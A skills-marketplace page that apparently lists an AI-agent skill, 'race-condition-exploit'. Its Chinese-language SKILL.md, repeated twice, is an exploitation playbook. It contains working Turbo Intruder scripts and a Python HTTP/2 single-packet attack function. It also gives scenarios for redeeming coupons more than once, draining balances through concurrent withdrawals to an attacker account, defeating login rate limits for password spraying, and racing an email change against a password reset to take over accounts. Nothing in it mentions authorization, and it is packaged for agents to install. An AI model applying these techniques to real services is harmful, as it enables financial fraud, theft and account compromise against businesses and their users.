Adoption

Agent Skills are supported by leading AI development tools.

VS Code Gemini CLI GitHub Goose Amp Cursor Claude Code Letta OpenCode Claude OpenAI Codex Factory VS Code Gemini CLI GitHub Goose Amp Cursor Claude Code Letta OpenCode Claude OpenAI Codex Factory

wgpsec/race-condition-exploit

Name: race-condition-exploit
Author: wgpsec

skills/exploit/advanced/race-condition-exploit/SKILL.md

npx skillsauth add wgpsec/AboutSecurity race-condition-exploit

Clean

TrivyContainer and dependency vulnerability scanner

Clean

SemgrepStatic code analysis for vulnerabilities

Clean

mcp-scan (Snyk)Model Context Protocol security validation

Skipped

Snyk (dep)Open source security scanning

Skipped

Socket.devSupply chain security analysis

Skipped

VirusTotalMulti-engine malware detection

Skipped

CrowdStrikeAdvanced threat intelligence

Skipped

OSV-ScannerOpen Source Vulnerability database check

Skipped

OWASP Dep-Check

竞态条件漏洞利用方法论

核心原理：在服务器"检查"和"使用"之间的时间窗口内，发送并发请求使同一操作被执行多次

⛔ 深入参考

Turbo Intruder 脚本与高级技巧 → references/turbo-intruder-scripts.md
多步骤竞态与复合利用场景 → references/multi-step-race.md
curl/Python/Barrier 并发脚本、文件上传竞争脚本 → references/race-scripts.md

Phase 1: 识别竞态条件攻击面

高价值目标操作：
├─ 💰 余额/积分/虚拟货币操作（转账、提现、消费）
├─ 🎟️ 优惠券/折扣码兑换（限用 1 次）
├─ 📦 限量库存购买（秒杀/抢购）
├─ 🔐 频率限制绕过（登录尝试、短信验证码）
├─ 📧 多步工作流（邮箱修改 → 密码重置）
├─ 👍 投票/点赞（每人限 1 次）
├─ 🎮 游戏资源（双重领取奖励）
├─ 🔑 一次性 Token 验证（同一 token 多次使用）
├─ 📝 注册/创建（检查唯一性 → 插入，创建重复账户）
└─ 📁 文件上传 → 处理管道（TOCTOU，在删除前访问 webshell）

| 场景 | 竞态目标 | 利用效果 | |------|----------|----------| | 余额消费/转账 | 检查余额 → 扣款 | 余额 100 同时发起两笔 100 的消费 | | 优惠券/兑换码 | 检查是否已使用 → 标记已使用 | 同一兑换码多次使用 | | 投票/点赞 | 检查是否已投 → 记录投票 | 刷票 | | 文件上传 | 上传 → 检查 → 删除恶意文件 | 在删除前访问上传的 webshell | | 一次性 token | 验证 token → 使 token 失效 | 同一 token 多次使用 | | 注册/创建 | 检查唯一性 → 插入 | 创建重复账户 | | 限购商品 | 检查库存 → 下单扣库存 | 超额购买 |

快速判断存在竞态的标志：

响应中有 "已使用" / "余额不足" / "已达上限" 等限制
正常重复提交返回错误 → 存在服务端状态检查 → 可能有时间窗口

Phase 2: 攻击技术选择

并发方法对比：
├─ Single-Packet Attack (HTTP/2) → 最精确，纳秒级同步 ⭐首选
├─ Last-Byte Sync (HTTP/1.1) → HTTP/1.1 场景的最佳方案
├─ Turbo Intruder gate → Burp Suite 中最方便
├─ 多线程 Python → 灵活但时间精度较低
└─ 普通 Repeater 并发 → 最简单，成功率最低

选择依据：
目标支持 HTTP/2？
├─ 是 → Single-Packet Attack（同一 TCP 连接发多请求）
└─ 否 → Last-Byte Sync（多连接，hold 最后一字节，同时释放）

Phase 3: Single-Packet Attack（HTTP/2 首选）

原理： HTTP/2 多路复用允许在单个 TCP 包中发送多个完整请求，服务器几乎同时处理

Turbo Intruder 脚本

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                          concurrentConnections=1,
                          engine=Engine.BURP2)  # HTTP/2

    # 同一操作重复 20 次，gate 同步释放
    for i in range(20):
        engine.queue(target.req, gate='race1')

    # 所有请求同时发出
    engine.openGate('race1')

def handleResponse(req, interesting):
    table.add(req)

Python 实现

import h2.connection
import h2.config
import h2.events
import socket, ssl

def single_packet_attack(host, port, requests, path='/redeem'):
    """HTTP/2 单包竞态攻击"""
    ctx = ssl.create_default_context()
    ctx.set_alpn_protocols(['h2'])

    sock = socket.create_connection((host, port))
    sock = ctx.wrap_socket(sock, server_hostname=host)

    config = h2.config.H2Configuration(client_side=True)
    conn = h2.connection.H2Connection(config=config)
    conn.initiate_connection()
    sock.sendall(conn.data_to_send())

    # 发送所有请求的 HEADERS（不发 DATA）
    stream_ids = []
    for i in range(requests):
        sid = conn.get_next_available_stream_id()
        stream_ids.append(sid)
        conn.send_headers(sid, [
            (':method', 'POST'),
            (':path', path),
            (':authority', host),
            ('content-type', 'application/x-www-form-urlencoded'),
        ])

    # 所有 DATA 帧打包在一起发送（单包！）
    for sid in stream_ids:
        conn.send_data(sid, b'coupon=DISCOUNT50', end_stream=True)

    # 一次性发出所有数据
    sock.sendall(conn.data_to_send())

    # 收集响应
    responses = {}
    while len(responses) < requests:
        data = sock.recv(65535)
        events = conn.receive_data(data)
        for event in events:
            if isinstance(event, h2.events.ResponseReceived):
                responses[event.stream_id] = dict(event.headers)
        sock.sendall(conn.data_to_send())

    return responses

Phase 4: Last-Byte Sync（HTTP/1.1 场景）

原理：
1. 建立 N 个 TCP 连接
2. 每个连接发送请求，但 hold 住最后一字节不发
3. 同时释放所有连接的最后一字节
→ 服务器同时收到 N 个完整请求

Turbo Intruder 实现：

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                          concurrentConnections=20,  # 20个并行连接
                          requestsPerConnection=1,
                          engine=Engine.THREADED)

    for i in range(20):
        engine.queue(target.req, gate='race1')

    engine.openGate('race1')

Phase 5: 常见利用场景

场景 A: 优惠券重复使用

正常流程：
1. POST /apply-coupon {code: "SAVE50"}
2. 服务器检查: 优惠券已使用? → 否
3. 服务器操作: 标记已使用 + 扣减金额

竞态攻击：
同时发送 20 个相同请求 → 所有请求在步骤 2 时都读到"未使用"
→ 优惠券被应用 20 次

验证: 检查最终账户余额/订单折扣是否超出预期

场景 B: 余额并发提现

正常: 余额 100 → 提现 100 → 余额 0
竞态: 余额 100 → 同时 5 次提现 100 → 可能成功 2-3 次 → 提取 200-300

关键请求:
POST /withdraw
{"amount": 100, "account": "attacker_account"}

场景 C: 频率限制绕过

限制: 每分钟 5 次登录尝试
竞态: 单包内发 100 次尝试 → 限制器来不及计数
→ 100 次尝试中只有最后几次被限制

用于: 密码喷洒 / 验证码爆破

场景 D: 多步骤竞态（高级）

攻击者邮箱修改 + 密码重置竞态：
1. 请求 A: POST /change-email {email: "[email protected]"}
2. 请求 B: POST /reset-password（同时发送）
→ 密码重置邮件可能发到攻击者新邮箱
   （因为邮箱修改和密码重置同时处理）

Phase 6: 验证成功

竞态成功的标志：
├─ 多个请求返回 200 OK（而非只有第一个成功）
├─ 余额/积分出现异常变化
├─ 同一操作被记录多次（日志/订单/交易）
├─ 频率限制未生效
└─ 系统状态不一致

工具速查

| 工具 | 用途 | |------|------| | Turbo Intruder | Burp 插件，gate 同步 | | Burp Repeater (Send group parallel) | 简单并发（Burp 2023+） | | racepwn | 专用竞态测试工具 | | Python asyncio + h2 | 自定义 HTTP/2 攻击 | | curl --parallel | 简单并发测试 |

wgpsec/race-condition-exploit

skills/exploit/advanced/race-condition-exploit/SKILL.md

竞态条件漏洞利用方法论。当目标有余额/积分操作、优惠券兑换、限量库存、频率限制、多步骤工作流（注册/密码重置/MFA）时使用。核心技术：HTTP/2 单包攻击（Single-Packet Attack）、Turbo Intruder、Last-Byte Sync

1,185 stars

tools

Updated Apr 24, 2026

$ install --global

skillsauth

npx skillsauth add wgpsec/AboutSecurity race-condition-exploit

Install this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.

Security Scan Results

3 of 9 scanners reported clean

Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.

Scanners Passed

Scanners in report

Clean

TrivyContainer and dependency vulnerability scanner

95%

Clean

SemgrepStatic code analysis for vulnerabilities

95%

Clean

mcp-scan (Snyk)Model Context Protocol security validation

95%

Skipped

Snyk (dep)Open source security scanning

50%

Skipped

Socket.devSupply chain security analysis

50%

Skipped

VirusTotalMulti-engine malware detection

50%

Skipped

CrowdStrikeAdvanced threat intelligence

50%

Skipped

OSV-ScannerOpen Source Vulnerability database check

50%

Skipped

OWASP Dep-Check

50%

Last scanned: Apr 24, 2026, 5:31 AM12.5s4 files scanned

SKILL.md

name:: race-condition-exploit
description:: 竞态条件漏洞利用方法论。当目标有余额/积分操作、优惠券兑换、限量库存、频率限制、多步骤工作流（注册/密码重置/MFA）时使用。核心技术：HTTP/2 单包攻击（Single-Packet Attack）、Turbo Intruder、Last-Byte Sync
tags:: race condition,toctou,concurrency,turbo intruder,single-packet,竞态条件,并发,余额,优惠券,限购,条件竞争,concurrent,双花,double spend,竞态,上传竞争,coupon,balance,purchase,购买,stock,limit,积分,重复,transfer,转账
category:: exploit
mitre_attack:: T1499

竞态条件漏洞利用方法论

核心原理：在服务器"检查"和"使用"之间的时间窗口内，发送并发请求使同一操作被执行多次

⛔ 深入参考

Turbo Intruder 脚本与高级技巧 → references/turbo-intruder-scripts.md
多步骤竞态与复合利用场景 → references/multi-step-race.md
curl/Python/Barrier 并发脚本、文件上传竞争脚本 → references/race-scripts.md

Phase 1: 识别竞态条件攻击面

高价值目标操作：
├─ 💰 余额/积分/虚拟货币操作（转账、提现、消费）
├─ 🎟️ 优惠券/折扣码兑换（限用 1 次）
├─ 📦 限量库存购买（秒杀/抢购）
├─ 🔐 频率限制绕过（登录尝试、短信验证码）
├─ 📧 多步工作流（邮箱修改 → 密码重置）
├─ 👍 投票/点赞（每人限 1 次）
├─ 🎮 游戏资源（双重领取奖励）
├─ 🔑 一次性 Token 验证（同一 token 多次使用）
├─ 📝 注册/创建（检查唯一性 → 插入，创建重复账户）
└─ 📁 文件上传 → 处理管道（TOCTOU，在删除前访问 webshell）

快速判断存在竞态的标志：

响应中有 "已使用" / "余额不足" / "已达上限" 等限制
正常重复提交返回错误 → 存在服务端状态检查 → 可能有时间窗口

Phase 2: 攻击技术选择

并发方法对比：
├─ Single-Packet Attack (HTTP/2) → 最精确，纳秒级同步 ⭐首选
├─ Last-Byte Sync (HTTP/1.1) → HTTP/1.1 场景的最佳方案
├─ Turbo Intruder gate → Burp Suite 中最方便
├─ 多线程 Python → 灵活但时间精度较低
└─ 普通 Repeater 并发 → 最简单，成功率最低

选择依据：
目标支持 HTTP/2？
├─ 是 → Single-Packet Attack（同一 TCP 连接发多请求）
└─ 否 → Last-Byte Sync（多连接，hold 最后一字节，同时释放）

Phase 3: Single-Packet Attack（HTTP/2 首选）

原理： HTTP/2 多路复用允许在单个 TCP 包中发送多个完整请求，服务器几乎同时处理

Turbo Intruder 脚本

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                          concurrentConnections=1,
                          engine=Engine.BURP2)  # HTTP/2

    # 同一操作重复 20 次，gate 同步释放
    for i in range(20):
        engine.queue(target.req, gate='race1')

    # 所有请求同时发出
    engine.openGate('race1')

def handleResponse(req, interesting):
    table.add(req)

Python 实现

import h2.connection
import h2.config
import h2.events
import socket, ssl

def single_packet_attack(host, port, requests, path='/redeem'):
    """HTTP/2 单包竞态攻击"""
    ctx = ssl.create_default_context()
    ctx.set_alpn_protocols(['h2'])

    sock = socket.create_connection((host, port))
    sock = ctx.wrap_socket(sock, server_hostname=host)

    config = h2.config.H2Configuration(client_side=True)
    conn = h2.connection.H2Connection(config=config)
    conn.initiate_connection()
    sock.sendall(conn.data_to_send())

    # 发送所有请求的 HEADERS（不发 DATA）
    stream_ids = []
    for i in range(requests):
        sid = conn.get_next_available_stream_id()
        stream_ids.append(sid)
        conn.send_headers(sid, [
            (':method', 'POST'),
            (':path', path),
            (':authority', host),
            ('content-type', 'application/x-www-form-urlencoded'),
        ])

    # 所有 DATA 帧打包在一起发送（单包！）
    for sid in stream_ids:
        conn.send_data(sid, b'coupon=DISCOUNT50', end_stream=True)

    # 一次性发出所有数据
    sock.sendall(conn.data_to_send())

    # 收集响应
    responses = {}
    while len(responses) < requests:
        data = sock.recv(65535)
        events = conn.receive_data(data)
        for event in events:
            if isinstance(event, h2.events.ResponseReceived):
                responses[event.stream_id] = dict(event.headers)
        sock.sendall(conn.data_to_send())

    return responses

Phase 4: Last-Byte Sync（HTTP/1.1 场景）

原理：
1. 建立 N 个 TCP 连接
2. 每个连接发送请求，但 hold 住最后一字节不发
3. 同时释放所有连接的最后一字节
→ 服务器同时收到 N 个完整请求

Turbo Intruder 实现：

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                          concurrentConnections=20,  # 20个并行连接
                          requestsPerConnection=1,
                          engine=Engine.THREADED)

    for i in range(20):
        engine.queue(target.req, gate='race1')

    engine.openGate('race1')

Phase 5: 常见利用场景

场景 A: 优惠券重复使用

正常流程：
1. POST /apply-coupon {code: "SAVE50"}
2. 服务器检查: 优惠券已使用? → 否
3. 服务器操作: 标记已使用 + 扣减金额

竞态攻击：
同时发送 20 个相同请求 → 所有请求在步骤 2 时都读到"未使用"
→ 优惠券被应用 20 次

验证: 检查最终账户余额/订单折扣是否超出预期

场景 B: 余额并发提现

正常: 余额 100 → 提现 100 → 余额 0
竞态: 余额 100 → 同时 5 次提现 100 → 可能成功 2-3 次 → 提取 200-300

关键请求:
POST /withdraw
{"amount": 100, "account": "attacker_account"}

场景 C: 频率限制绕过

限制: 每分钟 5 次登录尝试
竞态: 单包内发 100 次尝试 → 限制器来不及计数
→ 100 次尝试中只有最后几次被限制

用于: 密码喷洒 / 验证码爆破

场景 D: 多步骤竞态（高级）

攻击者邮箱修改 + 密码重置竞态：
1. 请求 A: POST /change-email {email: "[email protected]"}
2. 请求 B: POST /reset-password（同时发送）
→ 密码重置邮件可能发到攻击者新邮箱
   （因为邮箱修改和密码重置同时处理）

Phase 6: 验证成功

竞态成功的标志：
├─ 多个请求返回 200 OK（而非只有第一个成功）
├─ 余额/积分出现异常变化
├─ 同一操作被记录多次（日志/订单/交易）
├─ 频率限制未生效
└─ 系统状态不一致

工具速查

Related Skills

wgpsec/azure-pentesting

testing

VerifiedTrustedCommunity

Azure 云环境渗透测试总体方法论。当目标使用 Azure/Microsoft 365/Entra ID、发现 Azure 相关资产（Blob Storage/App Service/Azure VM/Azure Functions）、获取 Azure 凭据（Service Principal/Managed Identity/Access Token）、或需要对 Azure 环境进行安全评估时使用。提供从未授权枚举到 Entra ID 攻击、服务提权、Cloud-to-OnPrem 横向移动的全流程决策树。覆盖 35+ Azure 服务攻击面

1,393SKILL.mdUpdated Apr 24, 2026

wgpsec/azure-pentesting

wgpsec/mythic-c2

tools

VerifiedTrustedCommunity

Mythic C2 操作方法论。当需要部署 Mythic、选择 Mythic Agent、安装 C2 Profile、配置 HTTP/DNS/WebSocket/SMB/TCP 通信、生成 payload、管理回连任务，或把 Mythic 作为跨平台 C2 框架用于授权红队演练时使用。覆盖 mythic-cli 安装、Agent/Profile 选择、SSL 证书配置、payload 构建和基础 OPSEC 判断

1,345SKILL.mdUpdated May 22, 2026

wgpsec/docker-pentesting

development

VerifiedTrustedCommunity

Docker 安全测试与容器渗透方法论。当需要评估 Docker 容器、Docker Daemon、Docker Registry、镜像层、构建产物或容器逃逸风险时使用。覆盖容器环境识别、特权容器逃逸、docker.sock/Remote API 利用、procfs/cgroup/capabilities 滥用、Docker 用户组提权、运行时/内核 CVE、Registry 枚举、镜像层 Secret 分析和构建上下文泄露。发现 Docker 容器环境、Registry 暴露、镜像凭据或容器配置错误时应使用此技能

1,345SKILL.mdUpdated May 22, 2026

wgpsec/docker-pentesting

wgpsec/padbuster-padding-oracle

development

VerifiedTrustedCommunity

使用 PadBuster 进行 Padding Oracle 攻击。当发现 Web 应用使用 CBC 模式加密且存在 Padding Oracle 漏洞时使用。PadBuster 可自动解密密文和伪造任意明文对应的合法密文，适用于加密 Cookie/Token/URL 参数。任何涉及 Padding Oracle 攻击、CBC 密文解密、Cookie 伪造的场景都应使用此技能

1,345SKILL.mdUpdated May 6, 2026

wgpsec/padbuster-padding-oracle

Download

For Claude Desktop. Download once, then upload the file in the app — no terminal needed.

Need help? View full Cowork setup guide →

Install manually

Choose your platform

# Clone the repo
git clone https://github.com/wgpsec/AboutSecurity.git

# Copy into Claude Code skills folder (global)
cp -r AboutSecurity/skills/exploit/advanced/race-condition-exploit ~/.claude/skills/

Claude Code Skills — official skills path docs.

Repository

wgpsec/AboutSecurity

1,185 stars

Compatible with

Claude Code

OpenAI Codex CLI

ChatGPT